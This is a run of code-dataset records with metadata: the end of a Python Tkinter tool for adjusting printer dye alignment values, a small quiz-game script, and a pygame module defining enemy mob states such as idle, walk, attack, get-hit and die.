self.mark_change()\n\n def increment_dye_1(self):\n val = self.dye_1_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_1_var.set(val + 8)\n self.changed_dyes.add(1)\n self.mark_change()\n\n def decrement_dye_1(self):\n val = self.dye_1_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_1_var.set(val - 8)\n self.changed_dyes.add(1)\n self.mark_change()\n\n def increment_dye_2(self):\n val = self.dye_2_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_2_var.set(val + 8)\n self.changed_dyes.add(2)\n self.mark_change()\n\n def decrement_dye_2(self):\n val = self.dye_2_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_2_var.set(val - 8)\n self.changed_dyes.add(2)\n self.mark_change()\n\n def increment_dye_3(self):\n val = self.dye_3_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_3_var.set(val + 8)\n self.changed_dyes.add(3)\n self.mark_change()\n\n def decrement_dye_3(self):\n val = self.dye_3_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_3_var.set(val - 8)\n self.changed_dyes.add(3)\n self.mark_change()\n\n def increment_dye_4(self):\n val = self.dye_4_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_4_var.set(val + 8)\n self.changed_dyes.add(4)\n self.mark_change()\n\n def decrement_dye_4(self):\n val = self.dye_4_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_4_var.set(val - 8)\n self.changed_dyes.add(4)\n self.mark_change()\n\n def increment_dye_5(self):\n val = self.dye_5_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_5_var.set(val + 8)\n self.changed_dyes.add(5)\n self.mark_change()\n\n def decrement_dye_5(self):\n val = self.dye_5_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_5_var.set(val - 8)\n self.changed_dyes.add(5)\n self.mark_change()\n\n def increment_dye_6(self):\n val = self.dye_6_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_6_var.set(val + 8)\n self.changed_dyes.add(6)\n self.mark_change()\n\n def decrement_dye_6(self):\n val = self.dye_6_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_6_var.set(val - 8)\n self.changed_dyes.add(6)\n self.mark_change()\n\n def increment_dye_7(self):\n val = self.dye_7_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_7_var.set(val + 8)\n self.changed_dyes.add(7)\n self.mark_change()\n\n def decrement_dye_7(self):\n val = self.dye_7_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_7_var.set(val - 8)\n self.changed_dyes.add(7)\n self.mark_change()\n\n def increment_dye_8(self):\n val = self.dye_8_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_8_var.set(val + 8)\n self.changed_dyes.add(8)\n self.mark_change()\n\n def decrement_dye_8(self):\n val = self.dye_8_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_8_var.set(val - 8)\n self.changed_dyes.add(8)\n self.mark_change()\n\n def increment_dye_9(self):\n val = self.dye_9_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_9_var.set(val + 8)\n self.changed_dyes.add(9)\n self.mark_change()\n\n def decrement_dye_9(self):\n val = self.dye_9_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_9_var.set(val - 8)\n self.changed_dyes.add(9)\n self.mark_change()\n\n def increment_dye_10(self):\n val = self.dye_10_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_10_var.set(val + 8)\n self.changed_dyes.add(10)\n self.mark_change()\n\n def decrement_dye_10(self):\n val = self.dye_10_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_10_var.set(val - 8)\n self.changed_dyes.add(10)\n self.mark_change()\n\n def increment_dye_11(self):\n val = self.dye_11_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_11_var.set(val + 8)\n self.changed_dyes.add(11)\n self.mark_change()\n\n def decrement_dye_11(self):\n val = self.dye_11_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_11_var.set(val - 8)\n self.changed_dyes.add(11)\n self.mark_change()\n\n def increment_dye_12(self):\n val = self.dye_12_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_12_var.set(val + 8)\n self.changed_dyes.add(12)\n self.mark_change()\n\n def decrement_dye_12(self):\n val = self.dye_12_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_12_var.set(val - 8)\n self.changed_dyes.add(12)\n self.mark_change()\n\n def increment_dye_13(self):\n val = self.dye_13_var.get()\n if val in GAP_VALUE_RANGE and val < 200:\n self.dye_13_var.set(val + 8)\n self.changed_dyes.add(13)\n self.mark_change()\n\n def decrement_dye_13(self):\n val = self.dye_13_var.get()\n if val in GAP_VALUE_RANGE and val > -200:\n self.dye_13_var.set(val - 8)\n self.changed_dyes.add(13)\n self.mark_change()\n\n def validate_gap_value(self, num):\n try:\n num = int(num)\n except:\n return 0\n if num in GAP_VALUE_RANGE:\n return num\n if num > 200:\n return 200\n if num < -200:\n return -200\n for i in GAP_VALUE_RANGE:\n if i > num:\n return i\n\n def load_APA_file(self):\n sys_drive = os.getenv(\"SYSTEMDRIVE\")\n if not sys_drive:\n sys_drive = \"C:\"\n sys_drive = os.path.join(sys_drive)\n path = filedialog.askopenfilename(title = \"Load apa_data.pcl file\", initialdir=sys_drive, filetypes = [(\"APA Data File\", \"*.pcl\")])\n if path:\n if self.parse_APA_file(path):\n self.save_button[\"state\"] = \"normal\"\n self.dye_0_lab.configure(fg=\"blue\")\n self.dye_1_lab.configure(fg=\"blue\")\n self.dye_2_lab.configure(fg=\"blue\")\n self.dye_3_lab.configure(fg=\"blue\")\n self.dye_4_lab.configure(fg=\"blue\")\n self.dye_5_lab.configure(fg=\"blue\")\n self.dye_6_lab.configure(fg=\"blue\")\n self.dye_7_lab.configure(fg=\"blue\")\n self.dye_8_lab.configure(fg=\"blue\")\n self.dye_9_lab.configure(fg=\"blue\")\n self.dye_10_lab.configure(fg=\"blue\")\n self.dye_11_lab.configure(fg=\"blue\")\n self.dye_12_lab.configure(fg=\"blue\")\n self.dye_13_lab.configure(fg=\"blue\")\n self.dye_0_inc[\"state\"] = \"normal\"\n self.dye_0_dec[\"state\"] = \"normal\"\n self.dye_1_inc[\"state\"] = \"normal\"\n self.dye_1_dec[\"state\"] = \"normal\"\n self.dye_2_inc[\"state\"] = \"normal\"\n self.dye_2_dec[\"state\"] = \"normal\"\n self.dye_3_inc[\"state\"] = \"normal\"\n self.dye_3_dec[\"state\"] = \"normal\"\n self.dye_4_inc[\"state\"] = \"normal\"\n self.dye_4_dec[\"state\"] = \"normal\"\n self.dye_5_inc[\"state\"] = \"normal\"\n self.dye_5_dec[\"state\"] = \"normal\"\n self.dye_6_inc[\"state\"] = \"normal\"\n self.dye_6_dec[\"state\"] = \"normal\"\n self.dye_7_inc[\"state\"] = \"normal\"\n self.dye_7_dec[\"state\"] = \"normal\"\n self.dye_8_inc[\"state\"] = \"normal\"\n self.dye_8_dec[\"state\"] = \"normal\"\n self.dye_9_inc[\"state\"] = \"normal\"\n self.dye_9_dec[\"state\"] = \"normal\"\n self.dye_10_inc[\"state\"] = \"normal\"\n self.dye_10_dec[\"state\"] = \"normal\"\n self.dye_11_inc[\"state\"] = \"normal\"\n self.dye_11_dec[\"state\"] = \"normal\"\n self.dye_12_inc[\"state\"] = \"normal\"\n self.dye_12_dec[\"state\"] = \"normal\"\n self.dye_13_inc[\"state\"] = \"normal\"\n self.dye_13_dec[\"state\"] = \"normal\"\n self.statusBar.configure(fg=\"blue\")\n self.statusVar.set(FILE_LOAD_SUCCESSFULL)\n\n def parse_APA_file(self, path):\n if not os.path.exists(path):\n return False\n dye_values = {}\n with open(path, \"r\") as f:\n content = f.read()\n for line in content.split(\"\\n\"):\n if \"oem_set_alignment_values\" in line:\n values = get_raw_line_values(line)\n if values[0] == \"0\" and values[3] == \"0\":\n try:\n dye_values[int(values[2])] = int(values[4])\n except:\n return False\n if len(dye_values) != 14:\n return False\n for dye, value in dye_values.items():\n if dye == 0:\n self.dye_0_var.set(self.validate_gap_value(value))\n elif dye == 1:\n self.dye_1_var.set(self.validate_gap_value(value))\n elif dye == 2:\n self.dye_2_var.set(self.validate_gap_value(value))\n elif dye == 3:\n self.dye_3_var.set(self.validate_gap_value(value))\n elif dye == 4:\n self.dye_4_var.set(self.validate_gap_value(value))\n elif dye == 5:\n self.dye_5_var.set(self.validate_gap_value(value))\n elif dye == 6:\n self.dye_6_var.set(self.validate_gap_value(value))\n elif dye == 7:\n self.dye_7_var.set(self.validate_gap_value(value))\n elif dye == 8:\n self.dye_8_var.set(self.validate_gap_value(value))\n elif dye == 9:\n self.dye_9_var.set(self.validate_gap_value(value))\n elif dye == 10:\n self.dye_10_var.set(self.validate_gap_value(value))\n elif dye == 11:\n self.dye_11_var.set(self.validate_gap_value(value))\n elif dye == 12:\n self.dye_12_var.set(self.validate_gap_value(value))\n elif dye == 13:\n self.dye_13_var.set(self.validate_gap_value(value))\n return True\n\n def update_dye(self, dye):\n if dye < 0 or 13 < dye:\n return False\n dye_value = self.dye_vars[dye].get()\n for color in range(0, 4):\n if not set_dye(dye, color, dye_value):\n return False\n sleep(0.1)\n return True\n\n def save_changes(self):\n if not self.has_changed:\n return\n for dye in self.changed_dyes:\n if not self.update_dye(dye):\n self.statusVar.set(FILE_SAVE_UNSUCCESSFULL)\n self.statusBar.configure(fg=\"red\")\n return\n self.changed_dyes = set()\n self.has_changed = False\n self.statusVar.set(FILE_SAVE_SUCCESSFULL)\n self.statusBar.configure(fg=\"blue\")\n\n def mainloop(self):\n self.root.mainloop()\n\n\nif __name__ == \"__main__\":\n DGATool = DyeGapAdjustmentTool()\n DGATool.mainloop()\n", "repo_name": "ronny-toribio/DGAT", "sub_path": "dgat2.py", "file_name": "dgat2.py", "file_ext": "py", "file_size_in_byte": 30603, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.post", "line_number": 79, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 81, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 81, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 92, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 108, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 109, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 115, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 116, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 116, "usage_type": "name"}, {"api_name": "tkinter.Frame", "line_number": 121, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 123, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 125, "usage_type": "call"}, {"api_name": "tkinter.BOTTOM", "line_number": 126, "usage_type": "attribute"}, {"api_name": "tkinter.X", "line_number": 126, "usage_type": "attribute"}, {"api_name": "tkinter.StringVar", "line_number": 129, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 130, "usage_type": "call"}, {"api_name": "tkinter.SUNKEN", "line_number": 130, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 130, "usage_type": "attribute"}, {"api_name": "tkinter.IntVar", "line_number": 135, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 137, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 137, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 139, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 141, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 144, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 149, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 151, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 151, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 153, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 155, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 158, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 163, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 165, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 165, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 167, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 169, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 172, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 177, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 179, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 179, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 181, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 183, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 186, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 191, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 193, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 193, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 196, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 198, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 201, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 206, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 208, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 208, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 210, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 212, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 215, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 220, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 222, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 222, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 224, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 226, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 229, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 234, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 236, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 236, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 238, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 240, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 243, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 248, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 250, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 250, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 252, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 254, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 257, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 262, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 264, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 264, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 266, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 268, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 271, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 276, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 278, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 278, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 280, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 282, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 285, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 290, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 292, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 292, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 294, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 296, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 299, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 304, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 306, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 306, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 308, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 310, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 313, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 318, "usage_type": "call"}, {"api_name": "tkinter.ttk.LabelFrame", "line_number": 320, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 320, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 322, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 324, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 327, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 351, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 353, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 358, "usage_type": "call"}, {"api_name": "os.path", "line_number": 358, "usage_type": "attribute"}, {"api_name": "tkinter.PhotoImage", "line_number": 359, "usage_type": "call"}, {"api_name": "tkinter.PhotoImage", "line_number": 360, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 635, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 638, "usage_type": "call"}, {"api_name": "os.path", "line_number": 638, "usage_type": "attribute"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 639, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 639, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 689, "usage_type": "call"}, {"api_name": "os.path", "line_number": 689, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 742, "usage_type": "call"}]} +{"seq_id": "8734832013", "text": "from data import question_data\nfrom question_model import Question\nfrom quiz_brain import QuizBrain\n\nnew_Question = []\nfor q in question_data:\n question_text = q[\"text\"]\n answer_answer = q[\"answer\"]\n n_Question = Question(question_text, answer_answer)\n new_Question.append(n_Question)\n\nquiz = QuizBrain(new_Question)\nwhile quiz.is_still_Question():\n quiz.nextQuestion()\n\nprint(\"You've completed the quiz.\")\nprint(f\"Your final score is: {quiz.score}/{quiz.question_number}\")\n", "repo_name": "tusharbhardwaj0001/100_days_of_code-Python", "sub_path": "Day 17/quiz-game/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "data.question_data", "line_number": 6, "usage_type": "name"}, {"api_name": "question_model.Question", "line_number": 9, "usage_type": "call"}, {"api_name": "quiz_brain.QuizBrain", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "22867142527", "text": "import pygame as pg\nimport random\nimport math\nimport copy\nfrom settings import *\nfrom keyhandler import *\nfrom mechanics import *\nfrom imagemanager import *\n\nvec = pg.math.Vector2\n\nclass Mob(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites, game.rect_sprites, game.mob_sprites\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.x = x\n self.y = y\n self.vel = vec(0, 0)\n self.pos = vec(x, y)\n self.player_detected = False\n self.mob_class = \"Felltwin\"\n self.load_data()\n self.load_attributes()\n\n def load_data(self):\n self.states = {\"Idle\": Idle(self),\n \"Walk\": Walk(self),\n \"Attack\": Attack(self),\n \"GetHit\": GetHit(self),\n \"Die\": Die(self)}\n\n self.image_manager = ImageManager.get_instance()\n self.keyhandler = KeyHandler.get_instance()\n self.image_manager.load_mob_images(self.mob_class, self.states, self.keyhandler)\n self.state_name = \"Idle\"\n self.state = self.states[self.state_name]\n self.hit_rect = copy.copy(MOB_HIT_RECT)\n self.player_collision = False\n\n def load_attributes(self):\n self.totalhealth = self.currenthealth = self.previoushealth = 200\n self.damage = 40\n self.hit_rate = 100\n self.defense = 50\n self.level = 1\n\n def flip_state(self, state_name):\n \"\"\"Switch to the next game state.\"\"\"\n self.state.done[state_name] = False\n self.state_name = state_name\n persistent = self.state.persistence\n self.state = self.states[self.state_name]\n self.state.start_up(persistent)\n\n def events(self):\n self.state.events()\n\n def update(self, dt):\n for key, value in self.state.done.items():\n if value:\n self.flip_state(key)\n self.state.update(dt)\n self.image = self.state.image\n if self.currenthealth <= 0:\n return None\n if not hasattr(self, \"rect\"):\n self.rect = self.image.get_rect()\n self.health = Health(self.rect.width, 7)\n self.vel = self.state.vel\n self.pos.x += round(self.vel.x, 0)\n self.pos.y += round(self.vel.y, 0)\n self.hit_rect.centerx = self.pos.x\n if collide_hit_rect(self, self.game.player):\n self.player_collision = True\n detect_collision(self, self.game.rect_sprites, \"x\")\n self.hit_rect.centery = self.pos.y\n if collide_hit_rect(self, self.game.player):\n self.player_collision = True\n detect_collision(self, self.game.rect_sprites, \"y\")\n self.rect.center = self.hit_rect.center\n\n def detect_player(self):\n if self.pos.distance_to(self.game.player.pos) < 400:\n self.player_detected = True\n\n def gets_hit(self):\n if self.previoushealth > self.currenthealth:\n self.previoushealth = self.currenthealth\n return True\n return False\n\n def isdead(self):\n if self.currenthealth <= 0:\n self.previoushealth = self.currenthealth\n return True\n return False\n\n def draw_health(self, screen):\n ratio = self.currenthealth / self.totalhealth\n width = int(self.rect.width * ratio)\n self.health.set_width(width, 7)\n self.health.set_pos(self.rect.x, self.rect.y)\n self.health.get_color(ratio)\n screen.blit(self.health.image, self.game.camera.apply(self.health))\n\nclass MobState(pg.sprite.Sprite):\n def __init__(self, mob):\n pg.sprite.Sprite.__init__(self)\n self.image_manager = ImageManager.get_instance()\n self.keyhandler = KeyHandler.get_instance()\n self.game = mob.game\n self.mob = mob\n self.mob_class = mob.mob_class\n self.inital_data()\n\n def inital_data(self):\n self.current_frame = 0\n self.last_update = 0\n self.direction = \"down\"\n self.persistence = {\"direction\": self.direction}\n\n def start_up(self, direction_persistence):\n self.persistence = direction_persistence\n\n def events(self):\n pass\n\n def update(self, dt):\n pass\n\n def action(self, action_type, action_dir):\n self.last_dir = action_dir\n now = pg.time.get_ticks()\n if now - self.last_update > 100:\n self.last_update = now\n self.current_frame = (self.current_frame + 1) % len(action_type[action_dir])\n self.image = action_type[action_dir][self.current_frame]\n self.rect = self.image.get_rect()\n\nclass Idle(MobState):\n def __init__(self, mob):\n super().__init__(mob)\n self.done = {\"Walk\": False,\n \"Attack\": False,\n \"GetHit\": False,\n \"Die\": False}\n\n def start_up(self, persistence):\n self.persistence = persistence\n self.current_frame = 0\n self.direction = self.persistence[\"direction\"]\n\n def events(self):\n if self.mob.isdead():\n self.done[\"Die\"] = True\n elif self.mob.gets_hit():\n self.done[\"GetHit\"] = True\n elif self.mob.player_detected or (self.current_frame + 1) % len(self.image_manager.mob[self.mob_class][self.__class__.__name__][self.direction]) == 0:\n self.done[\"Walk\"] = True\n\n def update(self, dt):\n self.vel = vec(0, 0)\n self.mob.detect_player()\n self.action(self.image_manager.mob[self.mob_class][self.__class__.__name__], self.direction)\n\nclass Walk(MobState):\n def __init__(self, mob):\n super().__init__(mob)\n self.done = {\"Idle\": False,\n \"Attack\": False,\n \"GetHit\": False,\n \"Die\": False}\n\n def start_up(self, persistence):\n self.mob.player_collision = False\n self.persistence = persistence\n self.direction = self.persistence[\"direction\"]\n self.random_direction = self.keyhandler.get_key(random.randint(0, 7))\n self.distancia = 0\n\n def follow(self, dt):\n direction = \"\"\n distance_vector = (self.game.player.pos - self.mob.pos)\n distance_vector.x = round(distance_vector.x, 2)\n distance_vector.y = round(distance_vector.y, 2)\n for key, value in self.keyhandler.move_keys.items():\n if distance_vector.y != 0:\n distance_vector.y = math.copysign(1, distance_vector.y)\n direction += key if value[1] == distance_vector.y else \"\"\n for key, value in self.keyhandler.move_keys.items():\n if distance_vector.x != 0:\n distance_vector.x = math.copysign(1, distance_vector.x)\n direction += key if value[0] == distance_vector.x else \"\"\n self.vel = distance_vector * MOB_SPEED * dt\n\n return direction\n\n def events(self):\n if self.mob.isdead():\n self.done[\"Die\"] = True\n elif self.mob.gets_hit():\n self.done[\"GetHit\"] = True\n elif self.distancia >= 160 and not self.mob.player_detected:\n self.persistence[\"direction\"] = self.direction\n self.done[\"Idle\"] = True\n elif self.mob.player_collision:\n self.persistence[\"direction\"] = self.direction\n self.done[\"Attack\"] = True\n\n def update(self, dt):\n self.mob.detect_player()\n self.vel = vec(0, 0)\n if not self.mob.player_detected:\n self.direction = self.random_direction\n self.vel.x += self.keyhandler.vel_directions[self.random_direction][0] * MOB_SPEED * dt\n self.vel.y += self.keyhandler.vel_directions[self.random_direction][1] * MOB_SPEED * dt\n self.distancia += MOB_SPEED\n else:\n self.direction = self.follow(dt)\n\n if self.vel.x != 0 and self.vel.y != 0:\n self.distancia *= 1.4142\n self.vel *= 0.7071\n self.action(self.image_manager.mob[self.mob_class][self.__class__.__name__], self.direction)\n\nclass Attack(MobState):\n def __init__(self, mob):\n super().__init__(mob)\n self.done = {\"Idle\": False,\n \"Walk\": False,\n \"GetHit\": False,\n \"Die\": False}\n\n def start_up(self, persistence):\n self.persistence = persistence\n self.current_frame = 0\n self.direction = self.persistence[\"direction\"]\n\n def apply_damage(self):\n if not self.try_hit:\n self.try_hit = True\n if hit(self.mob.hit_rate, self.game.player.defense, self.mob.level, self.game.player.level):\n self.game.player.currenthealth -= self.mob.damage\n n = 1 - self.game.player.currenthealth/self.game.player.totalhealth\n self.game.hud.update(n, \"Life\")\n\n def events(self):\n if self.mob.isdead():\n self.done[\"Die\"] = True\n elif self.mob.gets_hit():\n self.done[\"GetHit\"] = True\n elif (self.current_frame + 1) % len(self.image_manager.mob[self.mob_class][self.__class__.__name__][self.direction]) == 0 and self.mob.pos.distance_to(self.game.player.pos) > 32:\n self.done[\"Idle\"] = True\n\n def update(self, dt):\n self.vel = vec(0, 0)\n if self.current_frame == 0:\n self.try_hit = False\n if self.current_frame == 10:\n self.apply_damage()\n self.action(self.image_manager.mob[self.mob_class][self.__class__.__name__], self.persistence[\"direction\"])\n\nclass GetHit(MobState):\n def __init__(self, mob):\n super().__init__(mob)\n self.done = {\"Idle\": False}\n\n def start_up(self, persistence):\n self.persistence = persistence\n self.current_frame = 0\n self.direction = self.persistence[\"direction\"]\n\n def events(self):\n if (self.current_frame + 1) % len(self.image_manager.mob[self.mob_class][self.__class__.__name__][self.direction]) == 0:\n self.done[\"Idle\"] = True\n\n def update(self, dt):\n self.vel = vec(0, 0)\n if self.mob.gets_hit():\n self.current_frame = 0\n self.action(self.image_manager.mob[self.mob_class][self.__class__.__name__], self.direction)\n\nclass Die(MobState):\n def __init__(self, mob):\n super().__init__(mob)\n self.hit_rect = pg.Surface((0, 0))\n self.finish = False\n self.done = {\"None\": None}\n\n def start_up(self, persistence):\n self.persistence = persistence\n self.current_frame = 0\n self.direction = self.persistence[\"direction\"]\n\n def update(self, dt):\n self.vel = vec(0, 0)\n if not self.finish:\n self.action(self.image_manager.mob[self.mob_class][self.__class__.__name__], self.direction)\n if self.current_frame == len(self.image_manager.mob[self.mob_class][self.__class__.__name__][self.direction]) - 1:\n self.finish = True\n self.mob.remove(self.mob.groups)\n self.mob.add(self.game.dead_sprites)\n\nclass Health:\n def __init__(self, width, height):\n self.image = pg.Surface((width, height))\n self.rect = self.image.get_rect()\n\n def get_color(self, ratio):\n if ratio > 0.6:\n self.image.fill(GREEN)\n elif ratio > 0.3:\n self.image.fill(YELLOW)\n else:\n self.image.fill(RED)\n\n def set_width(self, width, height):\n self.image = pg.Surface((width, height))\n self.rect = self.image.get_rect()\n\n def set_pos(self, x, y):\n self.rect.x = x\n self.rect.y = y\n", "repo_name": "Ricardo232/IS2-Grupo-F-Entregable-5", "sub_path": "IngenieriaSoftwareII-desarrollo/mobstate.py", "file_name": "mobstate.py", "file_ext": "py", "file_size_in_byte": 11573, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.math", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 15, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 109, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 109, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 134, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 134, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 179, "usage_type": "call"}, {"api_name": "math.copysign", "line_number": 189, "usage_type": "call"}, {"api_name": "math.copysign", "line_number": 193, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 287, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 307, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 319, "usage_type": "call"}]} +{"seq_id": "74131144165", "text": "import requests\nfrom bs4 import BeautifulSoup\n\nclass 